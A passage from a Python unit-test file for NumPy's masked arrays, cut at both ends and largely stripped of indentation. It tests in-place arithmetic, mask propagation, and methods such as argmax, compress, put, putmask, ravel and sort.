assert_equal(x, y * 2)
xm *= 2.0
assert_equal(xm, y * 2)
def test_inplace_multiplication_array(self):
# Test of inplace multiplication
(x, y, xm) = self.floatdata
m = xm.mask
a = arange(10, dtype=float)
a[-1] = masked
x *= a
xm *= a
assert_equal(x, y * a)
assert_equal(xm, y * a)
assert_equal(xm.mask, mask_or(m, a.mask))
def test_inplace_division_scalar_int(self):
# Test of inplace division
(x, y, xm) = self.intdata
x = arange(10) * 2
xm = arange(10) * 2
xm[2] = masked
x //= 2
assert_equal(x, y)
xm //= 2
assert_equal(xm, y)
def test_inplace_division_scalar_float(self):
# Test of inplace division
(x, y, xm) = self.floatdata
x /= 2.0
assert_equal(x, y / 2.0)
xm /= arange(10)
assert_equal(xm, ones((10,)))
def test_inplace_division_array_float(self):
# Test of inplace division
(x, y, xm) = self.floatdata
m = xm.mask
a = arange(10, dtype=float)
a[-1] = masked
x /= a
xm /= a
assert_equal(x, y / a)
assert_equal(xm, y / a)
assert_equal(xm.mask, mask_or(mask_or(m, a.mask), (a == 0)))
def test_inplace_division_misc(self):
x = [1., 1., 1., -2., pi / 2., 4., 5., -10., 10., 1., 2., 3.]
y = [5., 0., 3., 2., -1., -4., 0., -10., 10., 1., 0., 3.]
m1 = [1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]
m2 = [0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 1]
xm = masked_array(x, mask=m1)
ym = masked_array(y, mask=m2)
z = xm / ym
assert_equal(z._mask, [1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1])
assert_equal(z._data,
[1., 1., 1., -1., -pi / 2., 4., 5., 1., 1., 1., 2., 3.])
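        # The quotient's mask is the union of both input masks plus the
        # positions where the divisor ym is zero.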
#assert_equal(z._data, [0.2,1.,1./3.,-1.,-pi/2.,-1.,5.,1.,1.,1.,2.,1.])
xm = xm.copy()
xm /= ym
assert_equal(xm._mask, [1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1])
assert_equal(z._data,
[1., 1., 1., -1., -pi / 2., 4., 5., 1., 1., 1., 2., 3.])
#assert_equal(xm._data,
# [1/5.,1.,1./3.,-1.,-pi/2.,-1.,5.,1.,1.,1.,2.,1.])
def test_datafriendly_add(self):
# Test keeping data w/ (inplace) addition
x = array([1, 2, 3], mask=[0, 0, 1])
# Test add w/ scalar
xx = x + 1
assert_equal(xx.data, [2, 3, 3])
assert_equal(xx.mask, [0, 0, 1])
# Test iadd w/ scalar
x += 1
assert_equal(x.data, [2, 3, 3])
assert_equal(x.mask, [0, 0, 1])
# Test add w/ array
x = array([1, 2, 3], mask=[0, 0, 1])
xx = x + array([1, 2, 3], mask=[1, 0, 0])
assert_equal(xx.data, [1, 4, 3])
assert_equal(xx.mask, [1, 0, 1])
# Test iadd w/ array
x = array([1, 2, 3], mask=[0, 0, 1])
x += array([1, 2, 3], mask=[1, 0, 0])
assert_equal(x.data, [1, 4, 3])
assert_equal(x.mask, [1, 0, 1])
def test_datafriendly_sub(self):
# Test keeping data w/ (inplace) subtraction
# Test sub w/ scalar
x = array([1, 2, 3], mask=[0, 0, 1])
xx = x - 1
assert_equal(xx.data, [0, 1, 3])
assert_equal(xx.mask, [0, 0, 1])
# Test isub w/ scalar
x = array([1, 2, 3], mask=[0, 0, 1])
x -= 1
assert_equal(x.data, [0, 1, 3])
assert_equal(x.mask, [0, 0, 1])
# Test sub w/ array
x = array([1, 2, 3], mask=[0, 0, 1])
xx = x - array([1, 2, 3], mask=[1, 0, 0])
assert_equal(xx.data, [1, 0, 3])
assert_equal(xx.mask, [1, 0, 1])
# Test isub w/ array
x = array([1, 2, 3], mask=[0, 0, 1])
x -= array([1, 2, 3], mask=[1, 0, 0])
assert_equal(x.data, [1, 0, 3])
assert_equal(x.mask, [1, 0, 1])
def test_datafriendly_mul(self):
# Test keeping data w/ (inplace) multiplication
# Test mul w/ scalar
x = array([1, 2, 3], mask=[0, 0, 1])
xx = x * 2
assert_equal(xx.data, [2, 4, 3])
assert_equal(xx.mask, [0, 0, 1])
# Test imul w/ scalar
x = array([1, 2, 3], mask=[0, 0, 1])
x *= 2
assert_equal(x.data, [2, 4, 3])
assert_equal(x.mask, [0, 0, 1])
# Test mul w/ array
x = array([1, 2, 3], mask=[0, 0, 1])
xx = x * array([10, 20, 30], mask=[1, 0, 0])
assert_equal(xx.data, [1, 40, 3])
assert_equal(xx.mask, [1, 0, 1])
# Test imul w/ array
x = array([1, 2, 3], mask=[0, 0, 1])
x *= array([10, 20, 30], mask=[1, 0, 0])
assert_equal(x.data, [1, 40, 3])
assert_equal(x.mask, [1, 0, 1])
def test_datafriendly_div(self):
# Test keeping data w/ (inplace) division
# Test div on scalar
x = array([1, 2, 3], mask=[0, 0, 1])
xx = x / 2.
assert_equal(xx.data, [1 / 2., 2 / 2., 3])
assert_equal(xx.mask, [0, 0, 1])
# Test idiv on scalar
x = array([1., 2., 3.], mask=[0, 0, 1])
x /= 2.
assert_equal(x.data, [1 / 2., 2 / 2., 3])
assert_equal(x.mask, [0, 0, 1])
# Test div on array
x = array([1., 2., 3.], mask=[0, 0, 1])
xx = x / array([10., 20., 30.], mask=[1, 0, 0])
assert_equal(xx.data, [1., 2. / 20., 3.])
assert_equal(xx.mask, [1, 0, 1])
# Test idiv on array
x = array([1., 2., 3.], mask=[0, 0, 1])
x /= array([10., 20., 30.], mask=[1, 0, 0])
assert_equal(x.data, [1., 2 / 20., 3.])
assert_equal(x.mask, [1, 0, 1])
def test_datafriendly_pow(self):
# Test keeping data w/ (inplace) power
# Test pow on scalar
x = array([1., 2., 3.], mask=[0, 0, 1])
xx = x ** 2.5
assert_equal(xx.data, [1., 2. ** 2.5, 3.])
assert_equal(xx.mask, [0, 0, 1])
# Test ipow on scalar
x **= 2.5
assert_equal(x.data, [1., 2. ** 2.5, 3])
assert_equal(x.mask, [0, 0, 1])
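        # As with the other "datafriendly" ops above, the data under the mask
        # (the trailing 3) is left untouched.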
def test_datafriendly_add_arrays(self):
a = array([[1, 1], [3, 3]])
b = array([1, 1], mask=[0, 0])
a += b
assert_equal(a, [[2, 2], [4, 4]])
if a.mask is not nomask:
assert_equal(a.mask, [[0, 0], [0, 0]])
a = array([[1, 1], [3, 3]])
b = array([1, 1], mask=[0, 1])
a += b
assert_equal(a, [[2, 2], [4, 4]])
assert_equal(a.mask, [[0, 1], [0, 1]])
def test_datafriendly_sub_arrays(self):
a = array([[1, 1], [3, 3]])
b = array([1, 1], mask=[0, 0])
a -= b
assert_equal(a, [[0, 0], [2, 2]])
if a.mask is not nomask:
assert_equal(a.mask, [[0, 0], [0, 0]])
a = array([[1, 1], [3, 3]])
b = array([1, 1], mask=[0, 1])
a -= b
assert_equal(a, [[0, 0], [2, 2]])
assert_equal(a.mask, [[0, 1], [0, 1]])
def test_datafriendly_mul_arrays(self):
a = array([[1, 1], [3, 3]])
b = array([1, 1], mask=[0, 0])
a *= b
assert_equal(a, [[1, 1], [3, 3]])
if a.mask is not nomask:
assert_equal(a.mask, [[0, 0], [0, 0]])
a = array([[1, 1], [3, 3]])
b = array([1, 1], mask=[0, 1])
a *= b
assert_equal(a, [[1, 1], [3, 3]])
assert_equal(a.mask, [[0, 1], [0, 1]])
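        # Broadcasting the 1-D mask over the 2-D operand repeats it along the
        # broadcast axis, hence the repeated column pattern above.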
def test_inplace_addition_scalar_type(self):
# Test of inplace additions
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
xm[2] = masked
x += t(1)
assert_equal(x, y + t(1))
xm += t(1)
assert_equal(xm, y + t(1))
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_addition_array_type(self):
# Test of inplace additions
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
m = xm.mask
a = arange(10, dtype=t)
a[-1] = masked
x += a
xm += a
assert_equal(x, y + a)
assert_equal(xm, y + a)
assert_equal(xm.mask, mask_or(m, a.mask))
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_subtraction_scalar_type(self):
# Test of inplace subtractions
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
x -= t(1)
assert_equal(x, y - t(1))
xm -= t(1)
assert_equal(xm, y - t(1))
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_subtraction_array_type(self):
# Test of inplace subtractions
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
m = xm.mask
a = arange(10, dtype=t)
a[-1] = masked
x -= a
xm -= a
assert_equal(x, y - a)
assert_equal(xm, y - a)
assert_equal(xm.mask, mask_or(m, a.mask))
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_multiplication_scalar_type(self):
# Test of inplace multiplication
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
x *= t(2)
assert_equal(x, y * t(2))
xm *= t(2)
assert_equal(xm, y * t(2))
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_multiplication_array_type(self):
# Test of inplace multiplication
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
m = xm.mask
a = arange(10, dtype=t)
a[-1] = masked
x *= a
xm *= a
assert_equal(x, y * a)
assert_equal(xm, y * a)
assert_equal(xm.mask, mask_or(m, a.mask))
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_floor_division_scalar_type(self):
# Test of inplace division
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
x = arange(10, dtype=t) * t(2)
xm = arange(10, dtype=t) * t(2)
xm[2] = masked
x //= t(2)
xm //= t(2)
assert_equal(x, y)
assert_equal(xm, y)
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_floor_division_array_type(self):
# Test of inplace division
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
m = xm.mask
a = arange(10, dtype=t)
a[-1] = masked
x //= a
xm //= a
assert_equal(x, y // a)
assert_equal(xm, y // a)
assert_equal(
xm.mask,
mask_or(mask_or(m, a.mask), (a == t(0)))
)
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_division_scalar_type(self):
# Test of inplace division
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
x = arange(10, dtype=t) * t(2)
xm = arange(10, dtype=t) * t(2)
xm[2] = masked
# May get a DeprecationWarning or a TypeError.
#
# This is a consequence of the fact that this is true divide
# and will require casting to float for calculation and
# casting back to the original type. This will only be raised
# with integers. Whether it is an error or warning is only
# dependent on how stringent the casting rules are.
#
# Will handle the same way.
try:
x /= t(2)
assert_equal(x, y)
except (DeprecationWarning, TypeError) as e:
warnings.warn(str(e))
try:
xm /= t(2)
assert_equal(xm, y)
except (DeprecationWarning, TypeError) as e:
warnings.warn(str(e))
if issubclass(t, np.integer):
assert_equal(len(w), 2, "Failed on type=%s." % t)
else:
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_division_array_type(self):
# Test of inplace division
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
(x, y, xm) = (_.astype(t) for _ in self.uint8data)
m = xm.mask
a = arange(10, dtype=t)
a[-1] = masked
# May get a DeprecationWarning or a TypeError.
#
# This is a consequence of the fact that this is true divide
# and will require casting to float for calculation and
# casting back to the original type. This will only be raised
# with integers. Whether it is an error or warning is only
# dependent on how stringent the casting rules are.
#
# Will handle the same way.
try:
x /= a
assert_equal(x, y / a)
except (DeprecationWarning, TypeError) as e:
warnings.warn(str(e))
try:
xm /= a
assert_equal(xm, y / a)
assert_equal(
xm.mask,
mask_or(mask_or(m, a.mask), (a == t(0)))
)
except (DeprecationWarning, TypeError) as e:
warnings.warn(str(e))
if issubclass(t, np.integer):
assert_equal(len(w), 2, "Failed on type=%s." % t)
else:
assert_equal(len(w), 0, "Failed on type=%s." % t)
def test_inplace_pow_type(self):
# Test keeping data w/ (inplace) power
for t in self.othertypes:
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings("always")
# Test pow on scalar
x = array([1, 2, 3], mask=[0, 0, 1], dtype=t)
xx = x ** t(2)
xx_r = array([1, 2 ** 2, 3], mask=[0, 0, 1], dtype=t)
assert_equal(xx.data, xx_r.data)
assert_equal(xx.mask, xx_r.mask)
# Test ipow on scalar
x **= t(2)
assert_equal(x.data, xx_r.data)
assert_equal(x.mask, xx_r.mask)
assert_equal(len(w), 0, "Failed on type=%s." % t)
class TestMaskedArrayMethods(TestCase):
# Test class for miscellaneous MaskedArrays methods.
def setUp(self):
# Base data definition.
x = np.array([8.375, 7.545, 8.828, 8.5, 1.757, 5.928,
8.43, 7.78, 9.865, 5.878, 8.979, 4.732,
3.012, 6.022, 5.095, 3.116, 5.238, 3.957,
6.04, 9.63, 7.712, 3.382, 4.489, 6.479,
7.189, 9.645, 5.395, 4.961, 9.894, 2.893,
7.357, 9.828, 6.272, 3.758, 6.693, 0.993])
X = x.reshape(6, 6)
XX = x.reshape(3, 2, 2, 3)
m = np.array([0, 1, 0, 1, 0, 0,
1, 0, 1, 1, 0, 1,
0, 0, 0, 1, 0, 1,
0, 0, 0, 1, 1, 1,
1, 0, 0, 1, 0, 0,
0, 0, 1, 0, 1, 0])
mx = array(data=x, mask=m)
mX = array(data=X, mask=m.reshape(X.shape))
mXX = array(data=XX, mask=m.reshape(XX.shape))
m2 = np.array([1, 1, 0, 1, 0, 0,
1, 1, 1, 1, 0, 1,
0, 0, 1, 1, 0, 1,
0, 0, 0, 1, 1, 1,
1, 0, 0, 1, 1, 0,
0, 0, 1, 0, 1, 1])
m2x = array(data=x, mask=m2)
m2X = array(data=X, mask=m2.reshape(X.shape))
m2XX = array(data=XX, mask=m2.reshape(XX.shape))
self.d = (x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX)
def test_generic_methods(self):
# Tests some MaskedArray methods.
a = array([1, 3, 2])
assert_equal(a.any(), a._data.any())
assert_equal(a.all(), a._data.all())
assert_equal(a.argmax(), a._data.argmax())
assert_equal(a.argmin(), a._data.argmin())
assert_equal(a.choose(0, 1, 2, 3, 4), a._data.choose(0, 1, 2, 3, 4))
assert_equal(a.compress([1, 0, 1]), a._data.compress([1, 0, 1]))
assert_equal(a.conj(), a._data.conj())
assert_equal(a.conjugate(), a._data.conjugate())
m = array([[1, 2], [3, 4]])
assert_equal(m.diagonal(), m._data.diagonal())
assert_equal(a.sum(), a._data.sum())
assert_equal(a.take([1, 2]), a._data.take([1, 2]))
assert_equal(m.transpose(), m._data.transpose())
def test_allclose(self):
# Tests allclose on arrays
a = np.random.rand(10)
b = a + np.random.rand(10) * 1e-8
self.assertTrue(allclose(a, b))
# Test allclose w/ infs
a[0] = np.inf
self.assertTrue(not allclose(a, b))
b[0] = np.inf
self.assertTrue(allclose(a, b))
# Test all close w/ masked
a = masked_array(a)
a[-1] = masked
self.assertTrue(allclose(a, b, masked_equal=True))
self.assertTrue(not allclose(a, b, masked_equal=False))
# Test comparison w/ scalar
a *= 1e-8
a[0] = 0
self.assertTrue(allclose(a, 0, masked_equal=True))
# Test that the function works for MIN_INT integer typed arrays
a = masked_array([np.iinfo(np.int_).min], dtype=np.int_)
self.assertTrue(allclose(a, a))
def test_allany(self):
# Checks the any/all methods/functions.
x = np.array([[0.13, 0.26, 0.90],
[0.28, 0.33, 0.63],
[0.31, 0.87, 0.70]])
m = np.array([[True, False, False],
[False, False, False],
[True, True, False]], dtype=np.bool_)
mx = masked_array(x, mask=m)
mxbig = (mx > 0.5)
mxsmall = (mx < 0.5)
self.assertFalse(mxbig.all())
self.assertTrue(mxbig.any())
assert_equal(mxbig.all(0), [False, False, True])
assert_equal(mxbig.all(1), [False, False, True])
assert_equal(mxbig.any(0), [False, False, True])
assert_equal(mxbig.any(1), [True, True, True])
self.assertFalse(mxsmall.all())
self.assertTrue(mxsmall.any())
assert_equal(mxsmall.all(0), [True, True, False])
assert_equal(mxsmall.all(1), [False, False, False])
assert_equal(mxsmall.any(0), [True, True, False])
assert_equal(mxsmall.any(1), [True, True, False])
def test_allany_onmatrices(self):
x = np.array([[0.13, 0.26, 0.90],
[0.28, 0.33, 0.63],
[0.31, 0.87, 0.70]])
X = np.matrix(x)
m = np.array([[True, False, False],
[False, False, False],
[True, True, False]], dtype=np.bool_)
mX = masked_array(X, mask=m)
mXbig = (mX > 0.5)
mXsmall = (mX < 0.5)
self.assertFalse(mXbig.all())
self.assertTrue(mXbig.any())
assert_equal(mXbig.all(0), np.matrix([False, False, True]))
assert_equal(mXbig.all(1), np.matrix([False, False, True]).T)
assert_equal(mXbig.any(0), np.matrix([False, False, True]))
assert_equal(mXbig.any(1), np.matrix([True, True, True]).T)
self.assertFalse(mXsmall.all())
self.assertTrue(mXsmall.any())
assert_equal(mXsmall.all(0), np.matrix([True, True, False]))
assert_equal(mXsmall.all(1), np.matrix([False, False, False]).T)
assert_equal(mXsmall.any(0), np.matrix([True, True, False]))
assert_equal(mXsmall.any(1), np.matrix([True, True, False]).T)
def test_allany_oddities(self):
# Some fun with all and any
store = empty((), dtype=bool)
full = array([1, 2, 3], mask=True)
self.assertTrue(full.all() is masked)
full.all(out=store)
self.assertTrue(store)
        assert_equal(store._mask, True)
self.assertTrue(store is not masked)
store = empty((), dtype=bool)
self.assertTrue(full.any() is masked)
full.any(out=store)
self.assertTrue(not store)
        assert_equal(store._mask, True)
self.assertTrue(store is not masked)
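        # Supplying out= writes the result into the given array, so the usual
        # collapse to the masked singleton never happens.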
def test_argmax_argmin(self):
# Tests argmin & argmax on MaskedArrays.
(x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX) = self.d
assert_equal(mx.argmin(), 35)
assert_equal(mX.argmin(), 35)
assert_equal(m2x.argmin(), 4)
assert_equal(m2X.argmin(), 4)
assert_equal(mx.argmax(), 28)
assert_equal(mX.argmax(), 28)
assert_equal(m2x.argmax(), 31)
assert_equal(m2X.argmax(), 31)
assert_equal(mX.argmin(0), [2, 2, 2, 5, 0, 5])
assert_equal(m2X.argmin(0), [2, 2, 4, 5, 0, 4])
assert_equal(mX.argmax(0), [0, 5, 0, 5, 4, 0])
assert_equal(m2X.argmax(0), [5, 5, 0, 5, 1, 0])
assert_equal(mX.argmin(1), [4, 1, 0, 0, 5, 5, ])
assert_equal(m2X.argmin(1), [4, 4, 0, 0, 5, 3])
assert_equal(mX.argmax(1), [2, 4, 1, 1, 4, 1])
assert_equal(m2X.argmax(1), [2, 4, 1, 1, 1, 1])
def test_clip(self):
# Tests clip on MaskedArrays.
x = np.array([8.375, 7.545, 8.828, 8.5, 1.757, 5.928,
8.43, 7.78, 9.865, 5.878, 8.979, 4.732,
3.012, 6.022, 5.095, 3.116, 5.238, 3.957,
6.04, 9.63, 7.712, 3.382, 4.489, 6.479,
7.189, 9.645, 5.395, 4.961, 9.894, 2.893,
7.357, 9.828, 6.272, 3.758, 6.693, 0.993])
m = np.array([0, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 1,
0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1,
1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0])
mx = array(x, mask=m)
clipped = mx.clip(2, 8)
assert_equal(clipped.mask, mx.mask)
assert_equal(clipped._data, x.clip(2, 8))
assert_equal(clipped._data, mx._data.clip(2, 8))
def test_compress(self):
# test compress
a = masked_array([1., 2., 3., 4., 5.], fill_value=9999)
condition = (a > 1.5) & (a < 3.5)
assert_equal(a.compress(condition), [2., 3.])
a[[2, 3]] = masked
b = a.compress(condition)
assert_equal(b._data, [2., 3.])
assert_equal(b._mask, [0, 1])
assert_equal(b.fill_value, 9999)
assert_equal(b, a[condition])
condition = (a < 4.)
b = a.compress(condition)
assert_equal(b._data, [1., 2., 3.])
assert_equal(b._mask, [0, 0, 1])
assert_equal(b.fill_value, 9999)
assert_equal(b, a[condition])
a = masked_array([[10, 20, 30], [40, 50, 60]],
mask=[[0, 0, 1], [1, 0, 0]])
b = a.compress(a.ravel() >= 22)
assert_equal(b._data, [30, 40, 50, 60])
assert_equal(b._mask, [1, 1, 0, 0])
x = np.array([3, 1, 2])
b = a.compress(x >= 2, axis=1)
assert_equal(b._data, [[10, 30], [40, 60]])
assert_equal(b._mask, [[0, 1], [1, 0]])
def test_compressed(self):
# Tests compressed
a = array([1, 2, 3, 4], mask=[0, 0, 0, 0])
b = a.compressed()
assert_equal(b, a)
a[0] = masked
b = a.compressed()
assert_equal(b, [2, 3, 4])
a = array(np.matrix([1, 2, 3, 4]), mask=[0, 0, 0, 0])
b = a.compressed()
assert_equal(b, a)
self.assertTrue(isinstance(b, np.matrix))
a[0, 0] = masked
b = a.compressed()
assert_equal(b, [[2, 3, 4]])
def test_empty(self):
# Tests empty/like
datatype = [('a', int), ('b', float), ('c', '|S8')]
a = masked_array([(1, 1.1, '1.1'), (2, 2.2, '2.2'), (3, 3.3, '3.3')],
dtype=datatype)
assert_equal(len(a.fill_value.item()), len(datatype))
b = empty_like(a)
assert_equal(b.shape, a.shape)
assert_equal(b.fill_value, a.fill_value)
b = empty(len(a), dtype=datatype)
assert_equal(b.shape, a.shape)
assert_equal(b.fill_value, a.fill_value)
# check empty_like mask handling
a = masked_array([1, 2, 3], mask=[False, True, False])
b = empty_like(a)
assert_(not np.may_share_memory(a.mask, b.mask))
b = a.view(masked_array)
assert_(np.may_share_memory(a.mask, b.mask))
def test_put(self):
# Tests put.
d = arange(5)
n = [0, 0, 0, 1, 1]
m = make_mask(n)
x = array(d, mask=m)
self.assertTrue(x[3] is masked)
self.assertTrue(x[4] is masked)
x[[1, 4]] = [10, 40]
#self.assertTrue(x.mask is not m)
self.assertTrue(x[3] is masked)
self.assertTrue(x[4] is not masked)
assert_equal(x, [0, 10, 2, -1, 40])
x = masked_array(arange(10), mask=[1, 0, 0, 0, 0] * 2)
i = [0, 2, 4, 6]
x.put(i, [6, 4, 2, 0])
assert_equal(x, asarray([6, 1, 4, 3, 2, 5, 0, 7, 8, 9, ]))
assert_equal(x.mask, [0, 0, 0, 0, 0, 1, 0, 0, 0, 0])
x.put(i, masked_array([0, 2, 4, 6], [1, 0, 1, 0]))
assert_array_equal(x, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, ])
assert_equal(x.mask, [1, 0, 0, 0, 1, 1, 0, 0, 0, 0])
x = masked_array(arange(10), mask=[1, 0, 0, 0, 0] * 2)
put(x, i, [6, 4, 2, 0])
assert_equal(x, asarray([6, 1, 4, 3, 2, 5, 0, 7, 8, 9, ]))
assert_equal(x.mask, [0, 0, 0, 0, 0, 1, 0, 0, 0, 0])
put(x, i, masked_array([0, 2, 4, 6], [1, 0, 1, 0]))
assert_array_equal(x, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, ])
assert_equal(x.mask, [1, 0, 0, 0, 1, 1, 0, 0, 0, 0])
def test_put_nomask(self):
# GitHub issue 6425
x = zeros(10)
z = array([3., -1.], mask=[False, True])
x.put([1, 2], z)
self.assertTrue(x[0] is not masked)
assert_equal(x[0], 0)
self.assertTrue(x[1] is not masked)
assert_equal(x[1], 3)
self.assertTrue(x[2] is masked)
self.assertTrue(x[3] is not masked)
assert_equal(x[3], 0)
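        # put() creates a mask on a previously unmasked array as soon as the
        # inserted values carry masked entries (gh-6425).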
def test_put_hardmask(self):
# Tests put on hardmask
d = arange(5)
n = [0, 0, 0, 1, 1]
m = make_mask(n)
xh = array(d + 1, mask=m, hard_mask=True, copy=True)
xh.put([4, 2, 0, 1, 3], [1, 2, 3, 4, 5])
assert_equal(xh._data, [3, 4, 2, 4, 5])
def test_putmask(self):
x = arange(6) + 1
mx = array(x, mask=[0, 0, 0, 1, 1, 1])
mask = [0, 0, 1, 0, 0, 1]
# w/o mask, w/o masked values
xx = x.copy()
putmask(xx, mask, 99)
assert_equal(xx, [1, 2, 99, 4, 5, 99])
# w/ mask, w/o masked values
mxx = mx.copy()
putmask(mxx, mask, 99)
assert_equal(mxx._data, [1, 2, 99, 4, 5, 99])
assert_equal(mxx._mask, [0, 0, 0, 1, 1, 0])
# w/o mask, w/ masked values
values = array([10, 20, 30, 40, 50, 60], mask=[1, 1, 1, 0, 0, 0])
xx = x.copy()
putmask(xx, mask, values)
assert_equal(xx._data, [1, 2, 30, 4, 5, 60])
assert_equal(xx._mask, [0, 0, 1, 0, 0, 0])
# w/ mask, w/ masked values
mxx = mx.copy()
putmask(mxx, mask, values)
assert_equal(mxx._data, [1, 2, 30, 4, 5, 60])
assert_equal(mxx._mask, [0, 0, 1, 1, 1, 0])
# w/ mask, w/ masked values + hardmask
mxx = mx.copy()
mxx.harden_mask()
putmask(mxx, mask, values)
assert_equal(mxx, [1, 2, 30, 4, 5, 60])
def test_ravel(self):
# Tests ravel
a = array([[1, 2, 3, 4, 5]], mask=[[0, 1, 0, 0, 0]])
aravel = a.ravel()
assert_equal(aravel._mask.shape, aravel.shape)
a = array([0, 0], mask=[1, 1])
aravel = a.ravel()
assert_equal(aravel._mask.shape, a.shape)
a = array(np.matrix([1, 2, 3, 4, 5]), mask=[[0, 1, 0, 0, 0]])
aravel = a.ravel()
assert_equal(aravel.shape, (1, 5))
assert_equal(aravel._mask.shape, a.shape)
# Checks that small_mask is preserved
a = array([1, 2, 3, 4], mask=[0, 0, 0, 0], shrink=False)
assert_equal(a.ravel()._mask, [0, 0, 0, 0])
# Test that the fill_value is preserved
a.fill_value = -99
a.shape = (2, 2)
ar = a.ravel()
assert_equal(ar._mask, [0, 0, 0, 0])
assert_equal(ar._data, [1, 2, 3, 4])
assert_equal(ar.fill_value, -99)
# Test index ordering
assert_equal(a.ravel(order='C'), [1, 2, 3, 4])
assert_equal(a.ravel(order='F'), [1, 3, 2, 4])
def test_reshape(self):
# Tests reshape
x = arange(4)
x[0] = masked
y = x.reshape(2, 2)
assert_equal(y.shape, (2, 2,))
assert_equal(y._mask.shape, (2, 2,))
assert_equal(x.shape, (4,))
assert_equal(x._mask.shape, (4,))
def test_sort(self):
# Test sort
x = array([1, 4, 2, 3], mask=[0, 1, 0, 0], dtype=np.uint8)
sortedx = sort(x)
assert_equal(sortedx._data, [1, 2, 3, 4])
assert_equal(sortedx._mask, [0, 0, 0, 1])
sortedx = sort(x, endwith=False)
assert_equal(sortedx._data, [4, 1, 2, 3])
assert_equal(sortedx._mask, [1, 0, 0, 0])
x.sort()
assert_equal(x._data, [1, 2, 3, 4])
assert_equal(x._mask, [0, 0, 0, 1])
x = array([1, 4, 2, 3], mask=[0, 1, 0, 0], dtype=np.uint8)
x.sort(endwith=False)
assert_equal(x._data, [4, 1, 2, 3])
assert_equal(x._mask, [1, 0, 0, 0])
x = [1, 4, 2, 3]
sortedx = sort(x)
        self.assertTrue(not isinstance(sortedx, MaskedArray))
x = array([0, 1, -1, -2, 2], mask=nomask, dtype=np.int8)
sortedx = sort(x, endwith=False)
assert_equal(sortedx._data, [-2, -1, 0, 1, 2])
x = array([0, 1, -1, -2, 2], mask=[0, 1, 0, 0, 1], dtype=np.int8)
sortedx = sort(x, endwith=False)
assert_equal(sortedx._data, [1, 2, -2, -1, 0])
assert_equal(sortedx._mask, [1, 1, 0, 0, 0])
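    def test_sort_endwith_sketch(self):
        # Editor's sketch (hypothetical test, not part of the original
        # suite): endwith=True (the default) pushes masked entries to
        # the end and endwith=False to the front; either way the
        # unmasked data comes out sorted.
        x = array([3, 5, 1], mask=[0, 1, 0])
        assert_equal(sort(x).mask, [0, 0, 1])
        assert_equal(sort(x).compressed(), [1, 3])
        assert_equal(sort(x, endwith=False).mask, [1, 0, 0])
        assert_equal(sort(x, endwith=False).compressed(), [1, 3])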
def test_sort_2d(self):
# Check sort of 2D array.
# 2D array w/o mask
a = masked_array([[8, 4, 1], [2, 0, 9]])
a.sort(0)
assert_equal(a, [[2, 0, 1], [8, 4, 9]])
a = masked_array([[8, 4, 1], [2, 0, 9]])
a.sort(1)
assert_equal(a, [[1, 4, 8], [0, 2, 9]])
# 2D array w/mask
a = masked_array([[8, 4, 1], [2, 0, 9]], mask=[[1, 0, 0], [0, 0, 1]])
a.sort(0)
assert_equal(a, [[2, 0, 1], [8, 4, 9]])
assert_equal(a._mask, [[0, 0, 0], [1, 0, 1]])
a = masked_array([[8, 4, 1], [2, 0, 9]], mask=[[1, 0, 0], [0, 0, 1]])
a.sort(1)
assert_equal(a, [[1, 4, 8], [0, 2, 9]])
assert_equal(a._mask, [[0, 0, 1], [0, 0, 1]])
# 3D
a = masked_array([[[7, 8, 9], [4, 5, 6], [1, 2, 3]],
[[1, 2, 3], [7, 8, 9], [4, 5, 6]],
[[7, 8, 9], [1, 2, 3], [4, 5, 6]],
[[4, 5, 6], [1, 2, 3], [7, 8, 9]]])
a[a % 4 == 0] = masked
am = a.copy()
an = a.filled(99)
am.sort(0)
an.sort(0)
assert_equal(am, an)
am = a.copy()
an = a.filled(99)
am.sort(1)
an.sort(1)
assert_equal(am, an)
am = a.copy()
an = a.filled(99)
am.sort(2)
an.sort(2)
assert_equal(am, an)
def test_sort_flexible(self):
# Test sort on flexible dtype.
a = array(
data=[(3, 3), (3, 2), (2, 2), (2, 1), (1, 0), (1, 1), (1, 2)],
